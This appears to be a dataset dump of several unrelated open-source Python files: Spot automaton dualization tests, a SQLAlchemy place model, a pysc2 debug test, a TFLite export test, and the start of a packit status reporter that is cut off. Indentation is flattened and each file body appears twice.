AP: 1 "a"
Acceptance: 1 Fin(0)
properties: trans-labels explicit-labels state-acc
--BODY--
State: 0
[0] 1
[!0] 2
[0] 0
State: 1 {0}
[t] 1
State: 2
[0] 3
[!0] 0
State: 3 {0}
[t] 3
--END--""")
dual = spot.dualize(aut)
assert dualtype(aut, dual)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 3
Start: 0
AP: 1 "a"
acc-name: Buchi
Acceptance: 1 Inf(0)
properties: trans-labels explicit-labels state-acc complete
properties: deterministic
--BODY--
State: 0
[0] 0
[!0] 1
State: 1
[!0] 0
[0] 2
State: 2 {0}
[t] 2
--END--"""
aut = spot.automaton("""
HOA: v1
States: 3
Start: 0
AP: 1 "a"
Acceptance: 2 Fin(0) & Inf(1)
properties: trans-labels explicit-labels
--BODY--
State: 0
[!0] 0
[0] 1 {0}
[0] 2 {1}
State: 1
[t] 0
State: 2
[t] 0
--END--""")
dual = spot.dualize(aut)
assert dualtype(aut, dual)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 3
Start: 0
AP: 1 "a"
acc-name: parity min even 2
Acceptance: 2 Inf(0) | Fin(1)
properties: trans-labels explicit-labels state-acc complete
properties: deterministic univ-branch
--BODY--
State: 0
[!0] 0
[0] 1&2
State: 1 {0}
[t] 0
State: 2 {1}
[t] 0
--END--"""
aut = spot.translate('G!a R XFb')
test_assert(aut)
dual = spot.dualize(aut)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 5
Start: 0
AP: 2 "a" "b"
acc-name: co-Buchi
Acceptance: 1 Fin(0)
properties: trans-labels explicit-labels state-acc complete
properties: deterministic univ-branch
--BODY--
State: 0 {0}
[0&1] 0
[0&!1] 1
[!0&!1] 1&2
[!0&1] 0&2
State: 1
[0&1] 0
[0&!1] 1
[!0&!1] 1&2
[!0&1] 0&2
State: 2
[!0&1] 3
[0 | !1] 4
State: 3 {0}
[!0] 3
[0] 4
State: 4
[t] 4
--END--"""
opts = spot.option_map()
opts.set('output', spot.randltlgenerator.LTL)
opts.set('tree_size_min', 15)
opts.set('tree_size_max', 15)
opts.set('seed', 0)
opts.set('simplification_level', 0)
spot.srand(0)
rg = spot.randltlgenerator(2, opts)
for a in produce_automaton(produce_phi(rg, 1000)):
test_assert(a)
test_assert(spot.dualize(a), spot.dualize(spot.dualize(a)))
aut = spot.automaton("""
HOA: v1
States: 1
Start: 0
AP: 1 "a"
Acceptance: 3 Fin(2) & (Inf(1) | Fin(0))
--BODY--
State: 0
--END--""")
test_complement(aut)
for a in spot.automata('randaut -A \"random 0..6\" -H -D -n50 4|'):
test_complement(a) | lib/spot-2.8.1/tests/python/dualize.py |
import spot
import buddy
match_strings = [('is_buchi', 'is_co_buchi'),
('is_generalized_buchi', 'is_generalized_co_buchi'),
('is_all', 'is_none'),
('is_all', 'is_all'),
('is_buchi', 'is_all')]
# existential and universal are dual
# deterministic is self-dual
def dualtype(aut, dual):
if dual.acc().is_none():
return True
return (not spot.is_deterministic(aut) or spot.is_deterministic(dual))\
and (spot.is_universal(dual) or not aut.is_existential())\
and (dual.is_existential() or not spot.is_universal(aut))
def produce_phi(rg, n):
phi = []
while len(phi) < n:
phi.append(rg.next())
return phi
def produce_automaton(phi):
aut = []
for f in phi:
aut.append(spot.translate(f))
return aut
def test_aut(aut, d=None):
if d is None:
d = spot.dualize(aut)
aa = aut.acc()
da = d.acc()
complete = spot.is_complete(aut)
univ = aut.is_univ_dest(aut.get_init_state_number())
an = aut.num_states()
dn = d.num_states()
if not dualtype(aut, d):
return (False, 'Incorrect transition mode resulting of dual')
for p in match_strings:
if ((getattr(aa, p[0])() and getattr(da, p[1])())
or (getattr(aa, p[1])() and getattr(da, p[0])())):
return (True, '')
return (False, 'Incorrect acceptance type dual')
# Tests that a (deterministic) automaton and its complement have complementary
# languages.
# FIXME This test could be extended to non-deterministic automata with a
# dealternization procedure.
def test_complement(aut):
assert aut.is_deterministic()
d = spot.dualize(aut)
s = spot.product_or(aut, d)
assert spot.dualize(s).is_empty()
def test_assert(a, d=None):
t = test_aut(a, d)
if not t[0]:
print (t[1])
print (a.to_str('hoa'))
print (spot.dualize(a).to_str('hoa'))
assert False
aut = spot.translate('a')
test_assert(aut)
dual = spot.dualize(aut)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 3
Start: 1
AP: 1 "a"
acc-name: co-Buchi
Acceptance: 1 Fin(0)
properties: trans-labels explicit-labels state-acc complete
properties: deterministic stutter-invariant very-weak
--BODY--
State: 0 {0}
[t] 0
State: 1
[0] 0
[!0] 2
State: 2
[t] 2
--END--"""
aut = spot.automaton("""
HOA: v1
States: 3
Start: 0
AP: 2 "a" "b"
acc-name: Buchi
Acceptance: 1 Inf(0)
properties: trans-labels explicit-labels state-acc
--BODY--
State: 0
[0] 1
[0] 2
State: 1 {0}
[0] 1
State: 2 {0}
[1] 2
--END--""")
test_assert(aut)
dual = spot.dualize(aut)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 4
Start: 0
AP: 2 "a" "b"
acc-name: co-Buchi
Acceptance: 1 Fin(0)
properties: trans-labels explicit-labels state-acc complete
properties: deterministic univ-branch
--BODY--
State: 0
[!0] 3
[0] 1&2
State: 1 {0}
[0] 1
[!0] 3
State: 2 {0}
[1] 2
[!1] 3
State: 3
[t] 3
--END--"""
aut = spot.automaton("""
HOA: v1
States: 4
Start: 0&2
AP: 2 "a" "b"
acc-name: Buchi
Acceptance: 1 Inf(0)
properties: trans-labels explicit-labels state-acc univ-branch
--BODY--
State: 0
[0] 1
State: 1 {0}
[t] 1
State: 2
[1] 3
State: 3 {0}
[t] 3
--END--""")
test_assert(aut)
dual = spot.dualize(aut)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 2
Start: 1
AP: 2 "a" "b"
acc-name: all
Acceptance: 0 t
properties: trans-labels explicit-labels state-acc deterministic
--BODY--
State: 0
[t] 0
State: 1
[!0 | !1] 0
--END--"""
aut = spot.automaton("""
HOA: v1
States: 4
Start: 0&2
AP: 2 "a" "b"
Acceptance: 2 Inf(0) | Inf(1)
properties: trans-labels explicit-labels state-acc univ-branch
--BODY--
State: 0
[0] 1
State: 1 {0}
[t] 1
State: 2
[1] 3
State: 3 {1}
[t] 3
--END--""")
dual = spot.dualize(aut)
assert dualtype(aut, dual)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 2
Start: 1
AP: 2 "a" "b"
acc-name: all
Acceptance: 0 t
properties: trans-labels explicit-labels state-acc deterministic
--BODY--
State: 0
[t] 0
State: 1
[!0 | !1] 0
--END--"""
aut = spot.automaton("""
HOA: v1
States: 4
Start: 0
AP: 2 "a" "b"
Acceptance: 1 Inf(0) | Fin(0)
properties: trans-labels explicit-labels state-acc
--BODY--
State: 0
[0] 1
State: 1 {0}
[0] 3
State: 2
[0] 3
State: 3 {0}
[t] 3
--END--""")
dual = spot.dualize(aut)
assert dualtype(aut, dual)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 5
Start: 0
AP: 2 "a" "b"
acc-name: co-Buchi
Acceptance: 1 Fin(0)
properties: trans-labels explicit-labels state-acc complete
properties: deterministic
--BODY--
State: 0 {0}
[0] 1
[!0] 4
State: 1 {0}
[0] 3
[!0] 4
State: 2 {0}
[0] 3
[!0] 4
State: 3 {0}
[t] 3
State: 4
[t] 4
--END--"""
aut = spot.automaton("""
HOA: v1
States: 3
Start: 0
AP: 2 "a" "b"
Acceptance: 2 Inf(0) & Fin(1)
properties: trans-labels explicit-labels state-acc
--BODY--
State: 0 {0}
[0&!1] 1
[0&1] 2
State: 1 {1}
[1] 1
[0&!1] 2
State: 2
[!0&!1] 0
[t] 2
--END--""")
dual = spot.dualize(aut)
assert dualtype(aut, dual)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 4
Start: 0
AP: 2 "a" "b"
acc-name: Streett 1
Acceptance: 2 Fin(0) | Inf(1)
properties: trans-labels explicit-labels state-acc complete
properties: deterministic univ-branch
--BODY--
State: 0 {0}
[0&!1] 1
[0&1] 2
[!0] 3
State: 1 {1}
[1] 1
[0&!1] 2
[!0&!1] 3
State: 2
[0 | 1] 2
[!0&!1] 0&2
State: 3
[t] 3
--END--"""
aut = spot.automaton("""
HOA: v1
States: 3
Start: 0
AP: 1 "a"
Acceptance: 1 Inf(0) | Fin(0)
properties: trans-labels explicit-labels state-acc complete
--BODY--
State: 0
[0] 1
[!0] 2
State: 1 {0}
[t] 1
State: 2
[t] 2
[0] 0
--END--""")
dual = spot.dualize(aut)
assert dualtype(aut, dual)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 1
Start: 0
AP: 1 "a"
acc-name: none
Acceptance: 0 f
properties: trans-labels explicit-labels state-acc complete
properties: deterministic terminal
--BODY--
State: 0
[t] 0
--END--"""
aut = spot.automaton("""
HOA: v1
States: 3
Start: 0
AP: 1 "a"
Acceptance: 1 Inf(0) | Fin(0)
properties: trans-labels explicit-labels state-acc complete
--BODY--
State: 0
[0] 1
[!0] 2
State: 1 {0}
[t] 1
State: 2
[t] 2
--END--""")
dual = spot.dualize(aut)
assert dualtype(aut, dual)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 1
Start: 0
AP: 1 "a"
acc-name: none
Acceptance: 0 f
properties: trans-labels explicit-labels state-acc complete
properties: deterministic terminal
--BODY--
State: 0
[t] 0
--END--"""
aut = spot.automaton("""
HOA: v1
States: 3
Start: 0
AP: 2 "a" "b"
Acceptance: 1 Inf(0)
properties: trans-labels explicit-labels trans-acc
--BODY--
State: 0
[0&1] 1
[0&!1] 2
State: 1
[t] 1 {0}
[0] 0
State: 2
[0] 2
--END--""")
dual = spot.dualize(aut)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 3
Start: 0
AP: 2 "a" "b"
acc-name: co-Buchi
Acceptance: 1 Fin(0)
properties: trans-labels explicit-labels state-acc complete
properties: deterministic
--BODY--
State: 0
[0&1] 1
[!0 | !1] 2
State: 1 {0}
[t] 1
State: 2
[t] 2
--END--"""
aut = spot.automaton("""
HOA: v1
States: 3
Start: 0
AP: 1 "a"
Acceptance: 1 Fin(0)
properties: trans-labels explicit-labels state-acc
--BODY--
State: 0
[0] 1
[0] 2
State: 1 {0}
[0] 1
State: 2
[t] 2
--END--""")
dual = spot.dualize(aut)
assert dualtype(aut, dual)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 2
Start: 0
AP: 1 "a"
acc-name: Buchi
Acceptance: 1 Inf(0)
properties: trans-labels explicit-labels state-acc deterministic
--BODY--
State: 0
[!0] 1
State: 1 {0}
[t] 1
--END--"""
aut = spot.automaton("""
HOA: v1
States: 4
Start: 0
AP: 1 "a"
Acceptance: 1 Fin(0)
properties: trans-labels explicit-labels state-acc
--BODY--
State: 0
[0] 1
[!0] 2
[0] 0
State: 1 {0}
[t] 1
State: 2
[0] 3
[!0] 0
State: 3 {0}
[t] 3
--END--""")
dual = spot.dualize(aut)
assert dualtype(aut, dual)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 3
Start: 0
AP: 1 "a"
acc-name: Buchi
Acceptance: 1 Inf(0)
properties: trans-labels explicit-labels state-acc complete
properties: deterministic
--BODY--
State: 0
[0] 0
[!0] 1
State: 1
[!0] 0
[0] 2
State: 2 {0}
[t] 2
--END--"""
aut = spot.automaton("""
HOA: v1
States: 3
Start: 0
AP: 1 "a"
Acceptance: 2 Fin(0) & Inf(1)
properties: trans-labels explicit-labels
--BODY--
State: 0
[!0] 0
[0] 1 {0}
[0] 2 {1}
State: 1
[t] 0
State: 2
[t] 0
--END--""")
dual = spot.dualize(aut)
assert dualtype(aut, dual)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 3
Start: 0
AP: 1 "a"
acc-name: parity min even 2
Acceptance: 2 Inf(0) | Fin(1)
properties: trans-labels explicit-labels state-acc complete
properties: deterministic univ-branch
--BODY--
State: 0
[!0] 0
[0] 1&2
State: 1 {0}
[t] 0
State: 2 {1}
[t] 0
--END--"""
aut = spot.translate('G!a R XFb')
test_assert(aut)
dual = spot.dualize(aut)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 5
Start: 0
AP: 2 "a" "b"
acc-name: co-Buchi
Acceptance: 1 Fin(0)
properties: trans-labels explicit-labels state-acc complete
properties: deterministic univ-branch
--BODY--
State: 0 {0}
[0&1] 0
[0&!1] 1
[!0&!1] 1&2
[!0&1] 0&2
State: 1
[0&1] 0
[0&!1] 1
[!0&!1] 1&2
[!0&1] 0&2
State: 2
[!0&1] 3
[0 | !1] 4
State: 3 {0}
[!0] 3
[0] 4
State: 4
[t] 4
--END--"""
opts = spot.option_map()
opts.set('output', spot.randltlgenerator.LTL)
opts.set('tree_size_min', 15)
opts.set('tree_size_max', 15)
opts.set('seed', 0)
opts.set('simplification_level', 0)
spot.srand(0)
rg = spot.randltlgenerator(2, opts)
for a in produce_automaton(produce_phi(rg, 1000)):
test_assert(a)
test_assert(spot.dualize(a), spot.dualize(spot.dualize(a)))
aut = spot.automaton("""
HOA: v1
States: 1
Start: 0
AP: 1 "a"
Acceptance: 3 Fin(2) & (Inf(1) | Fin(0))
--BODY--
State: 0
--END--""")
test_complement(aut)
for a in spot.automata('randaut -A \"random 0..6\" -H -D -n50 4|'):
test_complement(a) | 0.453504 | 0.585457 |
from dataclasses import dataclass
from sqlalchemy import Column
from ..model import db
@dataclass
class PlaceDAO(db.Model):
__tablename__ = 'place'
__table_args__ = {'extend_existing': True}
id: int
place_num: int
place_name: str
content_id: int
sigungu_code: int
addr: str
lat: float
lng: float
event_start_date: str
event_end_date: str
first_image: str
second_image: str
detail_image: str
tel: str
tag: str
homepage: str
line_intro: str
readcount: int
industry: str
oper_date: str
oper_pd: str
modified_date: str
id = Column(db.Integer, primary_key=True)
place_num = Column(db.Integer, primary_key=False)
place_name = Column(db.String(50), primary_key=False)
content_id = Column(db.Integer, primary_key=False)
sigungu_code = Column(db.Integer, primary_key=False)
addr = Column(db.String(50), primary_key=False)
lat = Column(db.Float, primary_key=False)
lng = Column(db.Float, primary_key=False)
event_start_date = Column(db.String)
event_end_date = Column(db.String)
first_image = Column(db.String, primary_key=False)
second_image = Column(db.String, primary_key=False)
detail_image = Column(db.String, primary_key=False)
tel = Column(db.String, primary_key=False)
tag = Column(db.String, primary_key=False)
homepage = Column(db.String, primary_key=False)
line_intro = Column(db.String, primary_key=False)
readcount = Column(db.Integer, primary_key=False)
industry = Column(db.String, primary_key=False)
oper_date = Column(db.String, primary_key=False)
oper_pd = Column(db.String, primary_key=False)
modified_date = Column(db.String, primary_key=False)
def __init__(self, place_num, place_name, content_id, sigungu_code, addr, lat, lng,
event_start_date, event_end_date, first_image,
second_image, detail_image, tel, tag, homepage, line_intro,
readcount, industry, oper_date, oper_pd, modified_date):
self.place_num = place_num
self.place_name = place_name
self.content_id = content_id
self.sigungu_code = sigungu_code
self.addr = addr
self.lat = lat
self.lng = lng
self.event_start_date = event_start_date
self.event_end_date = event_end_date
self.first_image = first_image
self.second_image = second_image
self.detail_image = detail_image
self.tel = tel
self.tag = tag
self.homepage = homepage
self.line_intro = line_intro
self.readcount = readcount
self.industry = industry
self.oper_date = oper_date
self.oper_pd = oper_pd
self.modified_date = modified_date | camping_server1/app/main/model/place_dao.py | from dataclasses import dataclass
from sqlalchemy import Column
from ..model import db
@dataclass
class PlaceDAO(db.Model):
__tablename__ = 'place'
__table_args__ = {'extend_existing': True}
id: int
place_num: int
place_name: str
content_id: int
sigungu_code: int
addr: str
lat: float
lng: float
event_start_date: str
event_end_date: str
first_image: str
second_image: str
detail_image: str
tel: str
tag: str
homepage: str
line_intro: str
readcount: int
industry: str
oper_date: str
oper_pd: str
modified_date: str
id = Column(db.Integer, primary_key=True)
place_num = Column(db.Integer, primary_key=False)
place_name = Column(db.String(50), primary_key=False)
content_id = Column(db.Integer, primary_key=False)
sigungu_code = Column(db.Integer, primary_key=False)
addr = Column(db.String(50), primary_key=False)
lat = Column(db.Float, primary_key=False)
lng = Column(db.Float, primary_key=False)
event_start_date = Column(db.String)
event_end_date = Column(db.String)
first_image = Column(db.String, primary_key=False)
second_image = Column(db.String, primary_key=False)
detail_image = Column(db.String, primary_key=False)
tel = Column(db.String, primary_key=False)
tag = Column(db.String, primary_key=False)
homepage = Column(db.String, primary_key=False)
line_intro = Column(db.String, primary_key=False)
readcount = Column(db.Integer, primary_key=False)
industry = Column(db.String, primary_key=False)
oper_date = Column(db.String, primary_key=False)
oper_pd = Column(db.String, primary_key=False)
modified_date = Column(db.String, primary_key=False)
def __init__(self, place_num, place_name, content_id, sigungu_code, addr, lat, lng,
event_start_date, event_end_date, first_image,
second_image, detail_image, tel, tag, homepage, line_intro,
readcount, industry, oper_date, oper_pd, modified_date):
self.place_num = place_num
self.place_name = place_name
self.content_id = content_id
self.sigungu_code = sigungu_code
self.addr = addr
self.lat = lat
self.lng = lng
self.event_start_date = event_start_date
self.event_end_date = event_end_date
self.first_image = first_image
self.second_image = second_image
self.detail_image = detail_image
self.tel = tel
self.tag = tag
self.homepage = homepage
self.line_intro = line_intro
self.readcount = readcount
self.industry = industry
self.oper_date = oper_date
self.oper_pd = oper_pd
self.modified_date = modified_date | 0.588298 | 0.111145 |
"""Test that the debug commands work."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import absltest
from ctools.pysc2 import maps
from ctools.pysc2 import run_configs
from ctools.pysc2.lib import units
from s2clientprotocol import common_pb2 as sc_common
from s2clientprotocol import debug_pb2 as sc_debug
from s2clientprotocol import sc2api_pb2 as sc_pb
class DebugTest(absltest.TestCase):
def test_multi_player(self):
run_config = run_configs.get()
map_inst = maps.get("Simple64")
with run_config.start(want_rgb=False) as controller:
create = sc_pb.RequestCreateGame(
local_map=sc_pb.LocalMap(
map_path=map_inst.path, map_data=map_inst.data(run_config)))
create.player_setup.add(type=sc_pb.Participant)
create.player_setup.add(
type=sc_pb.Computer,
race=sc_common.Terran,
difficulty=sc_pb.VeryEasy)
join = sc_pb.RequestJoinGame(race=sc_common.Terran,
options=sc_pb.InterfaceOptions(raw=True))
controller.create_game(create)
controller.join_game(join)
info = controller.game_info()
map_size = info.start_raw.map_size
controller.step(2)
obs = controller.observe()
def get_marines(obs):
return {u.tag: u for u in obs.observation.raw_data.units
if u.unit_type == units.Terran.Marine}
self.assertEmpty(get_marines(obs))
controller.debug(sc_debug.DebugCommand(
create_unit=sc_debug.DebugCreateUnit(
unit_type=units.Terran.Marine,
owner=1,
pos=sc_common.Point2D(x=map_size.x // 2, y=map_size.y // 2),
quantity=5)))
controller.step(2)
obs = controller.observe()
marines = get_marines(obs)
self.assertEqual(5, len(marines))
tags = sorted(marines.keys())
controller.debug([
sc_debug.DebugCommand(kill_unit=sc_debug.DebugKillUnit(
tag=[tags[0]])),
sc_debug.DebugCommand(unit_value=sc_debug.DebugSetUnitValue(
unit_value=sc_debug.DebugSetUnitValue.Life, value=5,
unit_tag=tags[1])),
])
controller.step(2)
obs = controller.observe()
marines = get_marines(obs)
self.assertEqual(4, len(marines))
self.assertNotIn(tags[0], marines)
self.assertEqual(marines[tags[1]].health, 5)
if __name__ == "__main__":
absltest.main() | ctools/pysc2/tests/debug_test.py | """Test that the debug commands work."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import absltest
from ctools.pysc2 import maps
from ctools.pysc2 import run_configs
from ctools.pysc2.lib import units
from s2clientprotocol import common_pb2 as sc_common
from s2clientprotocol import debug_pb2 as sc_debug
from s2clientprotocol import sc2api_pb2 as sc_pb
class DebugTest(absltest.TestCase):
def test_multi_player(self):
run_config = run_configs.get()
map_inst = maps.get("Simple64")
with run_config.start(want_rgb=False) as controller:
create = sc_pb.RequestCreateGame(
local_map=sc_pb.LocalMap(
map_path=map_inst.path, map_data=map_inst.data(run_config)))
create.player_setup.add(type=sc_pb.Participant)
create.player_setup.add(
type=sc_pb.Computer,
race=sc_common.Terran,
difficulty=sc_pb.VeryEasy)
join = sc_pb.RequestJoinGame(race=sc_common.Terran,
options=sc_pb.InterfaceOptions(raw=True))
controller.create_game(create)
controller.join_game(join)
info = controller.game_info()
map_size = info.start_raw.map_size
controller.step(2)
obs = controller.observe()
def get_marines(obs):
return {u.tag: u for u in obs.observation.raw_data.units
if u.unit_type == units.Terran.Marine}
self.assertEmpty(get_marines(obs))
controller.debug(sc_debug.DebugCommand(
create_unit=sc_debug.DebugCreateUnit(
unit_type=units.Terran.Marine,
owner=1,
pos=sc_common.Point2D(x=map_size.x // 2, y=map_size.y // 2),
quantity=5)))
controller.step(2)
obs = controller.observe()
marines = get_marines(obs)
self.assertEqual(5, len(marines))
tags = sorted(marines.keys())
controller.debug([
sc_debug.DebugCommand(kill_unit=sc_debug.DebugKillUnit(
tag=[tags[0]])),
sc_debug.DebugCommand(unit_value=sc_debug.DebugSetUnitValue(
unit_value=sc_debug.DebugSetUnitValue.Life, value=5,
unit_tag=tags[1])),
])
controller.step(2)
obs = controller.observe()
marines = get_marines(obs)
self.assertEqual(4, len(marines))
self.assertNotIn(tags[0], marines)
self.assertEqual(marines[tags[1]].health, 5)
if __name__ == "__main__":
absltest.main() | 0.78233 | 0.332635 |
import itertools
import os
from absl.testing import parameterized
import tensorflow as tf
from official.core import exp_factory
from official.core import task_factory
from official.projects.edgetpu.vision.serving import export_util
def _build_experiment_model(experiment_type):
"""Builds model from experiment type configuration w/o loading checkpoint.
To reduce test latency and avoid unexpected errors (e.g. checkpoint files not
exist in the dedicated path), we skip the checkpoint loading for the tests.
Args:
experiment_type: model type for the experiment.
Returns:
TF/Keras model for the task.
"""
params = exp_factory.get_exp_config(experiment_type)
if 'deeplabv3plus_mobilenet_edgetpuv2' in experiment_type:
params.task.model.backbone.mobilenet_edgetpu.pretrained_checkpoint_path = None
if 'autoseg_edgetpu' in experiment_type:
params.task.model.model_params.model_weights_path = None
params.validate()
params.lock()
task = task_factory.get_task(params.task)
return task.build_model()
def _build_model(config):
model = _build_experiment_model(config.model_name)
model_input = tf.keras.Input(
shape=(config.image_size, config.image_size, 3), batch_size=1)
model_output = export_util.finalize_serving(model(model_input), config)
model_for_inference = tf.keras.Model(model_input, model_output)
return model_for_inference
def _dump_tflite(model, config):
converter = tf.lite.TFLiteConverter.from_keras_model(model)
export_util.configure_tflite_converter(config, converter)
tflite_buffer = converter.convert()
tf.io.gfile.makedirs(os.path.dirname(config.output_dir))
tflite_path = os.path.join(config.output_dir, f'{config.model_name}.tflite')
tf.io.gfile.GFile(tflite_path, 'wb').write(tflite_buffer)
return tflite_path
SEG_MODELS = [
'autoseg_edgetpu_xs',
]
FINALIZE_METHODS = [
'resize512,argmax,squeeze', 'resize256,argmax,resize512,squeeze',
'resize128,argmax,resize512,squeeze'
]
class ExportTfliteTest(tf.test.TestCase, parameterized.TestCase):
@parameterized.parameters(
('mobilenet_edgetpu_v2_xs', 224),
('autoseg_edgetpu_xs', 512),
('deeplabv3plus_mobilenet_edgetpuv2_xs_ade20k', 512),
('deeplabv3plus_mobilenet_edgetpuv2_xs_ade20k_32', 512),
)
def test_model_build_and_export_tflite(self, model_name, image_size):
tmp_dir = self.create_tempdir().full_path
config = export_util.ExportConfig(
model_name=model_name, image_size=image_size, output_dir=tmp_dir)
config.quantization_config.quantize = False
model = _build_model(config)
tflite_path = _dump_tflite(model, config)
self.assertTrue(tf.io.gfile.exists(tflite_path))
@parameterized.parameters(
('mobilenet_edgetpu_v2_xs', 224),
('autoseg_edgetpu_xs', 512),
('deeplabv3plus_mobilenet_edgetpuv2_xs_ade20k', 512),
('deeplabv3plus_mobilenet_edgetpuv2_xs_ade20k_32', 512),
)
def test_model_build_and_export_saved_model(self, model_name, image_size):
tmp_dir = self.create_tempdir().full_path
config = export_util.ExportConfig(
model_name=model_name, image_size=image_size, output_dir=tmp_dir)
model = _build_model(config)
saved_model_path = os.path.join(config.output_dir, config.model_name)
model.save(saved_model_path)
self.assertTrue(tf.saved_model.contains_saved_model(saved_model_path))
@parameterized.parameters(itertools.product(SEG_MODELS, FINALIZE_METHODS))
def test_segmentation_finalize_methods(self, model_name, finalize_method):
tmp_dir = self.create_tempdir().full_path
config = export_util.ExportConfig(
model_name=model_name,
image_size=512,
output_dir=tmp_dir,
finalize_method=finalize_method.split(','))
config.quantization_config.quantize = False
model = _build_model(config)
model_input = tf.random.normal([1, config.image_size, config.image_size, 3])
self.assertEqual(
model(model_input).get_shape().as_list(),
[1, config.image_size, config.image_size])
if __name__ == '__main__':
tf.test.main() | official/projects/edgetpu/vision/serving/export_tflite_test.py | import itertools
import os
from absl.testing import parameterized
import tensorflow as tf
from official.core import exp_factory
from official.core import task_factory
from official.projects.edgetpu.vision.serving import export_util
def _build_experiment_model(experiment_type):
"""Builds model from experiment type configuration w/o loading checkpoint.
To reduce test latency and avoid unexpected errors (e.g. checkpoint files not
exist in the dedicated path), we skip the checkpoint loading for the tests.
Args:
experiment_type: model type for the experiment.
Returns:
TF/Keras model for the task.
"""
params = exp_factory.get_exp_config(experiment_type)
if 'deeplabv3plus_mobilenet_edgetpuv2' in experiment_type:
params.task.model.backbone.mobilenet_edgetpu.pretrained_checkpoint_path = None
if 'autoseg_edgetpu' in experiment_type:
params.task.model.model_params.model_weights_path = None
params.validate()
params.lock()
task = task_factory.get_task(params.task)
return task.build_model()
def _build_model(config):
model = _build_experiment_model(config.model_name)
model_input = tf.keras.Input(
shape=(config.image_size, config.image_size, 3), batch_size=1)
model_output = export_util.finalize_serving(model(model_input), config)
model_for_inference = tf.keras.Model(model_input, model_output)
return model_for_inference
def _dump_tflite(model, config):
converter = tf.lite.TFLiteConverter.from_keras_model(model)
export_util.configure_tflite_converter(config, converter)
tflite_buffer = converter.convert()
tf.io.gfile.makedirs(os.path.dirname(config.output_dir))
tflite_path = os.path.join(config.output_dir, f'{config.model_name}.tflite')
tf.io.gfile.GFile(tflite_path, 'wb').write(tflite_buffer)
return tflite_path
SEG_MODELS = [
'autoseg_edgetpu_xs',
]
FINALIZE_METHODS = [
'resize512,argmax,squeeze', 'resize256,argmax,resize512,squeeze',
'resize128,argmax,resize512,squeeze'
]
class ExportTfliteTest(tf.test.TestCase, parameterized.TestCase):
@parameterized.parameters(
('mobilenet_edgetpu_v2_xs', 224),
('autoseg_edgetpu_xs', 512),
('deeplabv3plus_mobilenet_edgetpuv2_xs_ade20k', 512),
('deeplabv3plus_mobilenet_edgetpuv2_xs_ade20k_32', 512),
)
def test_model_build_and_export_tflite(self, model_name, image_size):
tmp_dir = self.create_tempdir().full_path
config = export_util.ExportConfig(
model_name=model_name, image_size=image_size, output_dir=tmp_dir)
config.quantization_config.quantize = False
model = _build_model(config)
tflite_path = _dump_tflite(model, config)
self.assertTrue(tf.io.gfile.exists(tflite_path))
@parameterized.parameters(
('mobilenet_edgetpu_v2_xs', 224),
('autoseg_edgetpu_xs', 512),
('deeplabv3plus_mobilenet_edgetpuv2_xs_ade20k', 512),
('deeplabv3plus_mobilenet_edgetpuv2_xs_ade20k_32', 512),
)
def test_model_build_and_export_saved_model(self, model_name, image_size):
tmp_dir = self.create_tempdir().full_path
config = export_util.ExportConfig(
model_name=model_name, image_size=image_size, output_dir=tmp_dir)
model = _build_model(config)
saved_model_path = os.path.join(config.output_dir, config.model_name)
model.save(saved_model_path)
self.assertTrue(tf.saved_model.contains_saved_model(saved_model_path))
@parameterized.parameters(itertools.product(SEG_MODELS, FINALIZE_METHODS))
def test_segmentation_finalize_methods(self, model_name, finalize_method):
tmp_dir = self.create_tempdir().full_path
config = export_util.ExportConfig(
model_name=model_name,
image_size=512,
output_dir=tmp_dir,
finalize_method=finalize_method.split(','))
config.quantization_config.quantize = False
model = _build_model(config)
model_input = tf.random.normal([1, config.image_size, config.image_size, 3])
self.assertEqual(
model(model_input).get_shape().as_list(),
[1, config.image_size, config.image_size])
if __name__ == '__main__':
tf.test.main() | 0.693992 | 0.282753 |
import hashlib
import logging
from typing import Optional, Union
import github
import gitlab
from ogr.abstract import CommitStatus, GitProject
from ogr.services.gitlab import GitlabProject
from ogr.services.pagure import PagureProject
logger = logging.getLogger(__name__)
class StatusReporter:
def __init__(
self,
project: GitProject,
commit_sha: str,
pr_id: Optional[int] = None,
):
logger.debug(
f"Status reporter will report for {project}, commit={commit_sha}, pr={pr_id}"
)
self.project: GitProject = project
self._project_with_commit: Optional[GitProject] = None
self.commit_sha: str = commit_sha
self.pr_id: Optional[int] = pr_id
@property
def project_with_commit(self) -> GitProject:
"""
Returns GitProject from which we can set commit status.
"""
if self._project_with_commit is None:
self._project_with_commit = (
self.project.get_pr(self.pr_id).source_project
if isinstance(self.project, GitlabProject) and self.pr_id is not None
else self.project
)
return self._project_with_commit
def report(
self,
state: CommitStatus,
description: str,
url: str = "",
check_names: Union[str, list, None] = None,
) -> None:
"""
set commit check status
:param state: state accepted by github
:param description: the long text
:param url: url to point to (logs usually)
:param check_names: those in bold
"""
if not check_names:
logger.warning("No checks to set status for.")
return
elif isinstance(check_names, str):
check_names = [check_names]
for check in check_names:
self.set_status(
state=state, description=description, check_name=check, url=url
)
def __set_pull_request_status(
self, check_name: str, description: str, url: str, state: CommitStatus
):
if self.pr_id is None:
return
pr = self.project.get_pr(self.pr_id)
if hasattr(pr, "set_flag") and pr.head_commit == self.commit_sha:
logger.debug("Setting the PR status (pagure only).")
pr.set_flag( # type: ignore
username=check_name,
comment=description,
url=url,
status=state,
# For Pagure: generate a custom uid from the check_name,
# so that we can update flags we set previously,
# instead of creating new ones.
uid=hashlib.md5(check_name.encode()).hexdigest(),
)
def report_status_by_comment(
self,
state: CommitStatus,
url: str,
check_names: Union[str, list, None],
description: str,
):
"""
Reporting build status with MR comment if no permission to the fork project
"""
if isinstance(check_names, str):
check_names = [check_names]
comment_table_rows = [
"| Job | Result |",
